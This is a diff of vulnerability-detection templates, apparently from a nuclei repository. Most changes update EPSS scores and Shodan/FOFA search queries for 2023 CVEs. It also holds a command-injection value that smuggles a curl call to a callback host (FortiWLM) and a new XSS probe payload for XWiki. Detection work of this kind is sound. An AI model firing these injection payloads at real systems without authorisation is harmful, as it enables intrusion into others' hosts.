CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34993 + cwe-id: CWE-78 + epss-score: 0.96644 + epss-percentile: 0.99631 + cpe: cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fortinet product: fortiwlm - shodan-query: http.title:"FortiWLM" + shodan-query: + - http.title:"FortiWLM" + - http.html:"fortiwlm" + - http.title:"fortiwlm" + fofa-query: + - body="fortiwlm" + - title="fortiwlm" + google-query: intitle:"fortiwlm" tags: cve,cve2023,fortinet,fortiwlm,rce,unauth - variables: progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log" @@ -42,4 +56,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 490a0046304402205d0bf594e5e591c8131ea79f03e90148cd44bb6a34f98409151d12e3e02decdf02200769496d8dae7769c9ed8d8aff7f94757ad51ddb46d0c8212cba99fd3f6c225b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205a332f7b02191f50bbdffc0c070e03f669898fd78fd7b47176911f36a6231f5702203ad403ffd2de74ac672ebe4c762a1c1b56bb9ab395485fa85fade4d08e0e046b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 17a14dd29e..34986e24a9 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -20,15 +20,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35078 cwe-id: CWE-287 - epss-score: 0.94864 - epss-percentile: 0.99112 + epss-score: 0.96825 + epss-percentile: 0.99689 cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ivanti product: endpoint_manager_mobile - shodan-query: http.favicon.hash:362091310 + shodan-query: + - http.favicon.hash:362091310 + - http.favicon.hash:"362091310" fofa-query: icon_hash="362091310" tags: cve,cve2023,kev,ivanti,mobileiron,epmm @@ -45,4 +47,4 @@ http: - contains(header, 'application/json') - status_code == 200 condition: and -# digest: 4a0a00473045022100e1348fd4216357ac7e04464f4ee2110e2828d3baf74786912a7106513c9d0f35022036ee43c70796a983b64da6cf1e77b10acd9d728c64a873b8785e14159e5f999e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e81119c0813b00e47072c081343c595b2ef8c5e95ffaf4e9fc5b03ce9e908230022100d72112d6dba2bd24756337b25c2a2dd7eb705c28b42d3674980e42ef40213f91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 7851495228..08da8bf200 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -13,22 +13,26 @@ info: - https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2023-35082 - https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US + - https://github.com/Chocapikk/CVE-2023-35082 + - https://github.com/Ostorlab/KEV classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-35082 cwe-id: CWE-287 - epss-score: 0.07991 - epss-percentile: 0.93656 + epss-score: 0.96732 + epss-percentile: 0.9966 cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ivanti product: endpoint_manager_mobile - shodan-query: http.favicon.hash:362091310 + shodan-query: + - http.favicon.hash:362091310 + - http.favicon.hash:"362091310" fofa-query: icon_hash="362091310" - tags: cve2023,cve,ivanti,mobileiron,epmm + tags: cve2023,cve,ivanti,mobileiron,epmm,kev http: - method: GET @@ -43,4 +47,4 @@ http: - contains(header, 'application/json') - status_code == 200 condition: and -# digest: 490a004630440220294c36ae327578d5c37bbd02ecaddc883e04adf0ba0c9abd849ee966e6ac2aa002203394fbc3e007a113edbf89c8f0d1799750ba6b77f9e3894b8fb601d6e8e0d05a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206702aa2fa81c73af6527e7787118ebadcf29180430928e3bc14653af8e998871022016579004bf1530a83e0640a0dcab8e5c6abc73598758d064bf917bfc3996d707:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml index cec2140f85..0003fea863 100644 --- a/http/cves/2023/CVE-2023-35158.yaml +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -17,15 +17,19 @@ info: cvss-score: 6.1 cve-id: CVE-2023-35158 cwe-id: CWE-87 - epss-score: 0.00105 - epss-percentile: 0.42103 + epss-score: 0.62633 + epss-percentile: 0.97829 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: xwiki product: xwiki - shodan-query: "XWiki" + shodan-query: + - "XWiki" + - xwiki + - http.html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" tags: cve,cve2023,xwiki,xss http: @@ -40,4 +44,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100c6c91bc1cafbd787223af97e5547530e8543d2a73bdc2cfb85cedd488a7e695b022006c285923b223b83c2a2d0b7436f826f8058fb22a2641e34fef6c20843b50804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200d194a8ba0215722eef75f47793612556c309a23957a41c3a7bfc3eef3a42779022100f20a9c24a66611d3e34c021e04f429ab7fe14b13b16990525f579490b6c2605f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35162.yaml b/http/cves/2023/CVE-2023-35162.yaml new file mode 100644 index 0000000000..5a195329a1 --- /dev/null +++ b/http/cves/2023/CVE-2023-35162.yaml @@ -0,0 +1,49 @@ +id: CVE-2023-35162 + +info: + name: XWiki < 14.10.5 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + XWiki Platform is vulnerable to reflected XSS via the previewactions template. An attacker can inject JavaScript through the xcontinue parameter. + impact: | + Successful exploitation could lead to unauthorized access or data theft. + remediation: | + Apply the latest patches provided by XWiki to mitigate the vulnerability. + reference: + - https://jira.xwiki.org/browse/XWIKI-20342 + - https://github.com/xwiki/xwiki-platform/blob/244dbbaa0738a0c40b19929c0369c8b62ae5236e/xwiki-platform-core/xwiki-platform-flamingo/xwiki-platform-flamingo-skin/xwiki-platform-flamingo-skin-resources/src/main/resources/flamingo/previewactions.vm#L48 + - https://nvd.nist.gov/vuln/detail/CVE-2023-35162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-35162 + cwe-id: CWE-79 + epss-score: 0.00129 + epss-percentile: 0.47675 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: xwiki + product: xwiki + shodan-query: + - XWiki + - xwiki + - http.html:"data-xwiki-reference" + fofa-query: "body=\"data-xwiki-reference\"" + tags: cve,cve2023,xwiki,xss + +http: + - method: GET + path: + - "{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)" + + matchers: + - type: dsl + dsl: + - 'contains(body, "name=\"xcontinue\" value=\"javascript:alert(document.domain)")' + - 'contains(body, "previewactions.vm")' + - 'contains(header, "text/html")' + - 'status_code == 200' + condition: and +# digest: 4b0a00483046022100c6e714e3d33b065507816e176e9f2be23252e0b05e84a4f0e6309440dabd0afa0221009ffd025b7bf1d45fb4926720821acd73a98d13982380dbf46ba15d57c33102e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index 4f3d631987..aae3c30140 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -17,14 +17,18 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35813 cwe-id: CWE-22,CWE-23 - epss-score: 0.72023 - epss-percentile: 0.97805 + epss-score: 0.8819 + epss-percentile: 0.98674 cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sitecore product: experience_commerce - shodan-query: title:"Sitecore" + shodan-query: + - title:"Sitecore" + - http.title:"sitecore" + fofa-query: title="sitecore" + google-query: intitle:"sitecore" tags: cve2023,cve,sitecore,rce variables: string: "{{rand_base(6)}}" @@ -54,4 +58,4 @@ http: - contains_all(body, 'commands', 'command', 'value') - status_code == 200 condition: and -# digest: 4a0a004730450221008be0771baa09541819eed8cf8490b59d21222fd4e149890367eb446483e86aad022022d5602d27c4a4dbfb1831c5bbfc693e39da6614d3b85493036b7352a98c6033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e3153dc84f4ba7e286424b653c26c3bb3b658b1651591ad03ff10e7525b31a7c022100cd5787950a2707a418d57a6f0cfce198a1313f079f8ee54d35cec5bc4f49b57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index f3ed2f48c3..266441641a 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-35843 cwe-id: CWE-22 - epss-score: 0.03299 - epss-percentile: 0.91091 + epss-score: 0.06332 + epss-percentile: 0.93628 cpe: cpe:2.3:a:nocodb:nocodb:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: nocodb product: nocodb shodan-query: http.favicon.hash:-2017596142 + fofa-query: icon_hash=-2017596142 tags: cve2023,cve,nocodb,lfi http: @@ -46,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d54ca66a373a5bdcb687b5b8b95c728c3ce6b58452faa138205faece235ac65b02210088184db11f7365836e9398e8726d7171649424fa801671bb3b01055266eec5e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210088559921b903d99eb60be5c8d1c736542f2efcb6c870db07e407f880b952766902201f27e867d62d7b074b3f4239f748cfdceaa4a639ef021eb983afa2e4a1421592:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index 76e5b32c83..a50b1b987c 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -32,7 +32,11 @@ info: max-request: 1 vendor: lightdash product: lightdash - shodan-query: title:"Lightdash" + shodan-query: + - title:"Lightdash" + - http.title:"lightdash" + fofa-query: title="lightdash" + google-query: intitle:"lightdash" tags: cve,cve2023,lightdash,lfi http: @@ -49,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220243836b94a2d61545b25c455eded8de7de85ac65d3b6b9af8a8fcc77b63fd743022100f5505508a01612d3ac0944285448da37021c6c8b43040cc8e87ead6567966426:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220078c71d90ded5920c359305cf1fc5e017ee9a9e47afb2b5d957ae714438e74160221008de080f01a9ccb2d392f1d76f2a30d50ae71161f67ffdf6d4eaf8ce7792b6e19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index 3cab287c26..1f37582285 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -21,17 +21,23 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35885 cwe-id: CWE-565 - epss-score: 0.02964 - epss-percentile: 0.89873 + epss-score: 0.48073 + epss-percentile: 0.97467 cpe: cpe:2.3:a:mgt-commerce:cloudpanel:*:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: mgt-commerce product: cloudpanel - shodan-query: title:"Cloudpanel" + shodan-query: + - title:"Cloudpanel" + - http.title:"cloudpanel" + - http.favicon.hash:"151132309" + fofa-query: + - icon_hash="151132309" + - title="cloudpanel" + google-query: intitle:"cloudpanel" tags: cve2023,cve,cloudpanel,rce,intrusive,mgt-commerce,fileupload - variables: session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY=" str1: "{{rand_base(10)}}" @@ -73,4 +79,4 @@ http: part: body_5 words: - '{{md5(string)}}' -# digest: 4b0a00483046022100d7b6619c72c238c99a15d4e2ccbeb5947b35506428ff680745d8ed73d15be7aa022100f8ef9c366ae03cf2cabed62594a0196e56719a271b4b998989058443a21834d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022005bf8c8a3b3b2bec29dd4ba7cd1da445c71437eb9d7b3c226e9b5e4ac7c8eec4022068ee1c986b70232e2fe5f05f26a7e12819b7490f0623339bb63a2cb3ed945bd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index d5812e686c..d513a9391d 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -18,14 +18,18 @@ info: cvss-score: 7.5 cve-id: CVE-2023-36144 cwe-id: CWE-862 - epss-score: 0.02858 - epss-percentile: 0.90492 + epss-score: 0.03179 + epss-percentile: 0.91154 cpe: cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelbras product: sg_2404_mr_firmware - shodan-query: title:"Intelbras" + shodan-query: + - title:"Intelbras" + - http.title:"intelbras" + fofa-query: title="intelbras" + google-query: intitle:"intelbras" tags: cve2023,cve,intelbras,switch,exposure http: @@ -51,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c87539b230266de86c5cb08d7a6ad9aaaeb4263821230046e194e05e8a0174c4022100f43f59553b68b72f32bd7190982615fd429469fe92dedf5ac1147322a2b44bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015c8d803dd17aa15d2b5b1fd7082fa9e5137cef412e74f60e9f69a8f170226a70220359f792ecb6d7df6a0bba14872b10f3d32a06043c855bd4c8f2b347eeff46deb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index dacbb3caae..4cbd3f2e93 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -18,17 +18,18 @@ info: cvss-score: 7.5 cve-id: CVE-2023-36284 cwe-id: CWE-89 - epss-score: 0.00061 - epss-percentile: 0.24798 + epss-score: 0.00721 + epss-percentile: 0.80577 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 2 vendor: webkul product: qloapps - fofa-query: title="QloApps" - tags: cve,cve2023,qloapps,sqli - + fofa-query: + - "title=\"QloApps\"" + - title="qloapps" + tags: cve,cve2023,qloapps,sqli,webkul flow: http(1) && http(2) http: @@ -57,4 +58,4 @@ http: - duration>=5 - 'contains(body, "Guest Information")' condition: and -# digest: 490a0046304402202f3f74b2aa2805006791102f5519990f7d0e4824ad34b3c4abeed275fedb7caa02204b28c27e4cdb49f6286322ce20f2009ee727d644cfaa0880970674e4487400e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100be761ba1c4d35d37f2477043c838509e758b5823b11e9519c50e36a8e9ca07bf022100b0e938bfb91cfacfd6a64d4c5a6004b91a17cb3b28e226db6648e2fe19a9433d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 51933089f6..376885c52a 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -19,14 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-36287 cwe-id: CWE-79 - epss-score: 0.00075 - epss-percentile: 0.30832 + epss-score: 0.0009 + epss-percentile: 0.38405 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: webkul product: qloapps + fofa-query: title="qloapps" tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul http: @@ -55,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022039dcb449ff8816bc8cca6ea716b492917a6bc9699edff02714b46da93f9a584c022020e0fe7c1a69d8fc404e66eb77dbdbdcc0ac90efddccafe76b4adb310f5b540e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c8d8b8a7e397064411042c3c9892231cf0075e26054416f0d77179c53a88a107022100eeec4f5165b4101d2bd809a7cbd2dfaee4950ab40d84ff7e6876c7089b79a01e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index 0e918eae9a..610c0d8772 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -19,14 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-36289 cwe-id: CWE-79 - epss-score: 0.00083 - epss-percentile: 0.33945 + epss-score: 0.0009 + epss-percentile: 0.38405 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: webkul product: qloapps + fofa-query: title="qloapps" tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul variables: email: "{{randstr}}@{{rand_base(5)}}.com" @@ -57,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202166d86ce51fb834d2224a38c2fc782a361c00323225718ad53ac225a1fc99e5022100b50ae20578925fa33bf3bf21b84ca62ad1f608e065b119d67da180e3c888efb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008437593007f282b4fa436dde37e968f021cdcb420dc06e8dad33f90f5c9c07d602210095e900731062e3f7559a188a77a5651a8de341aef8e82c5ebce4b0cabe0ae026:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml index e917ea324e..3a2dde0702 100644 --- a/http/cves/2023/CVE-2023-36306.yaml +++ b/http/cves/2023/CVE-2023-36306.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-36306 cwe-id: CWE-79 epss-score: 0.00385 - epss-percentile: 0.70371 + epss-percentile: 0.73054 cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: verified: true @@ -36,4 +36,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, ">") && contains(body, "Adiscon LogAnalyzer")' condition: and -# digest: 4a0a0047304502206a66f6bc50518dd31432eccadd91e6dc8c2f79f3e27eb9f8b19578b0d72173a6022100d83612654984ad122725ef43c6cb741afbb79651f92547af91c3b9caa1409694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f97821e8560212cacd737cf3143cc95c35378c592396c0c7cca9d2e93acf482302210080da39a9593817aa30d0248c17f050014f39b550c97b784de33e60ea07a0c2e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index 28b2667599..c67daa15c9 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-36346 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39295 + epss-score: 0.00107 + epss-percentile: 0.43313 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: verified: "true" @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fe79b6e44ab8020b7faefa67f3a3d4942a785bad4463a968f3dd2a6f86c3f762022100f7d484210f37cf4a1a39a45131261d1aebd56373323505b1eddfac6ce045f90d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e3b73e83543aad29fe760dc1db5fe37af306be56393c9926c65237e1566087e022100fbaedc4ef522a795c82b516441b5c8986414a7cf70007ec13d5535577d0db370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml index 7e0206581a..fc59f9c301 100644 --- a/http/cves/2023/CVE-2023-36347.yaml +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -15,10 +15,11 @@ info: cvss-score: 7.5 cve-id: CVE-2023-36347 cwe-id: CWE-306 - epss-score: 0.00103 - epss-percentile: 0.41216 + epss-score: 0.01502 + epss-percentile: 0.86929 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: + max-request: 2 vendor: codekop product: codekop tags: cve,cve2023,codekop,pos,auth-bypass @@ -41,4 +42,4 @@ http: part: header words: - "application/vnd.ms-excel" -# digest: 4a0a00473045022077189be5ccce61297097eca131b1b294f7016b564239aa193f2d5f7e10fe3804022100f0e9a5eb809b62f99118a52f104c6347d099bf2f0aa8236cd2e35d766eede99e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f40c2a82acd274bf0a12dd8ee05b0b119d3c8e9af5d8b045f2415c041b1be7810221009dca8bf6565170469423bd5b8781eab18af6d4d0d6ffbb58d4d519cfe3f484f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index a792bc8dd0..3777c684c3 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -21,14 +21,14 @@ info: cvss-score: 5.3 cve-id: CVE-2023-36844 cwe-id: CWE-473 - epss-score: 0.03926 - epss-percentile: 0.91134 - cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* + epss-score: 0.74086 + epss-percentile: 0.98118 + cpe: cpe:2.3:h:juniper:srx100:-:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: juniper - product: junos + product: srx100 shodan-query: title:"Juniper Web Device Manager" tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev variables: @@ -81,4 +81,4 @@ http: regex: - "([a-f0-9]{64}\\.ini)" internal: true -# digest: 4b0a00483046022100a67930b1a559ef939fdac690ac071be30685b6ef1c3c0a846c5569458aba33af022100c8fab782acd1cf1010a6d7ffa9d61f885432f29c8247207c7ca0b60d43b67a23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050c0c86d37adc93f15483be39ba88b4ef0b2147733b63f599775bb98e8b82e5702202f3f2ce3ef76d2946847a13a8badb6ce89120b87a6559d7b4e4187a798e29c70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index a8800a4134..458cb57ebe 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -19,15 +19,19 @@ info: cvss-score: 9.8 cve-id: CVE-2023-36845 cwe-id: CWE-473 - epss-score: 0.69312 - epss-percentile: 0.97711 + epss-score: 0.96663 + epss-percentile: 0.99636 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: juniper product: junos - shodan-query: title:"Juniper Web Device Manager" + shodan-query: + - title:"Juniper Web Device Manager" + - http.title:"juniper web device manager" + fofa-query: title="juniper web device manager" + google-query: intitle:"juniper web device manager" tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev http: @@ -54,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d0b807462fd2f740b6f35584821ecfcf41b62f92b2d611633a88ce0956d97ccc02202e8a6c9210020dea7ac6831519e021a0a8c55e8fac3baf8525bcb12e15dd4fcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210094213efa04f5b8466007dd26b490b4bea8fdaf4fb671f6c5152ea13ae90c1a10022100b2c8f5ffc5e7eedb018155013f03779d8c3bcac457a65b7e2244c82907991d9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index c6493bc628..ab96df5842 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.1 cve-id: CVE-2023-36934 cwe-id: CWE-89 - epss-score: 0.09049 - epss-percentile: 0.94466 + epss-score: 0.15264 + epss-percentile: 0.95843 cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: progress product: moveit_transfer shodan-query: http.favicon.hash:989289239 + fofa-query: icon_hash=989289239 tags: cve,cve2023,moveit,rce,sqli,intrusive,progress variables: session_cookie: "{{randstr}}" @@ -102,4 +103,4 @@ http: regex: - '"access_token":"([^"]+)"' part: body_4 -# digest: 490a0046304402207ad7b347a592e2187ab82ad8fcd08c9e9450340488818c2461f1b556f453438d022052153b577f0a31f4f323829b25293bd92882d19fd5ee60f7374293fec0f1dc93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ac504d10da08b3f7ed6416ad38d78217a6e95a680ec872cb3ab0c7b19370adab022100f5c4676697e678d9c7b57b56b4645a1352e5f9859614a9ea306cde51d543e182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3710.yaml b/http/cves/2023/CVE-2023-3710.yaml index 3ade203f7f..569f2aa483 100644 --- a/http/cves/2023/CVE-2023-3710.yaml +++ b/http/cves/2023/CVE-2023-3710.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3710 cwe-id: CWE-77,CWE-20 - epss-score: 0.75328 - epss-percentile: 0.97883 + epss-score: 0.70969 + epss-percentile: 0.98042 cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: honeywell product: pm43_firmware shodan-query: http.html:"/main/login.lua?pageid=" + fofa-query: body="/main/login.lua?pageid=" tags: cve2023,cve,honeywell,pm43,printer,iot,rce http: @@ -52,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e65673944288c4ea38c1044a22777033e8ab6412a422cd751c1d2f1ed8dbf9a302207988cbc88e6e5d2a866dc57363ee691a4b374a1422637e2c051edb10462c5421:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205c5a80d771051373a8c6b0c2ca248ca734e5ee7408acfd6d2fb3c85902d221fb0221008f595d668911595afa24a9370d94dfb8fec9e8ce381ef47016acd2dc70a53914:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 23a94dbbbc..0a8df4eee9 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -20,16 +20,20 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37265 cwe-id: CWE-306 - epss-score: 0.14233 - epss-percentile: 0.95569 + epss-score: 0.04239 + epss-percentile: 0.92256 cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: icewhale product: casaos - shodan-query: http.html:"/CasaOS-UI/public/index.html" - fofa-query: body="/CasaOS-UI/public/index.html" + shodan-query: + - http.html:"/CasaOS-UI/public/index.html" + - http.html:"/casaos-ui/public/index.html" + fofa-query: + - body="/CasaOS-UI/public/index.html" + - body="/casaos-ui/public/index.html" tags: cve,cve2023,oss,casaos,jwt,icewhale http: @@ -52,4 +56,4 @@ http: - type: json json: - .data.content[].path -# digest: 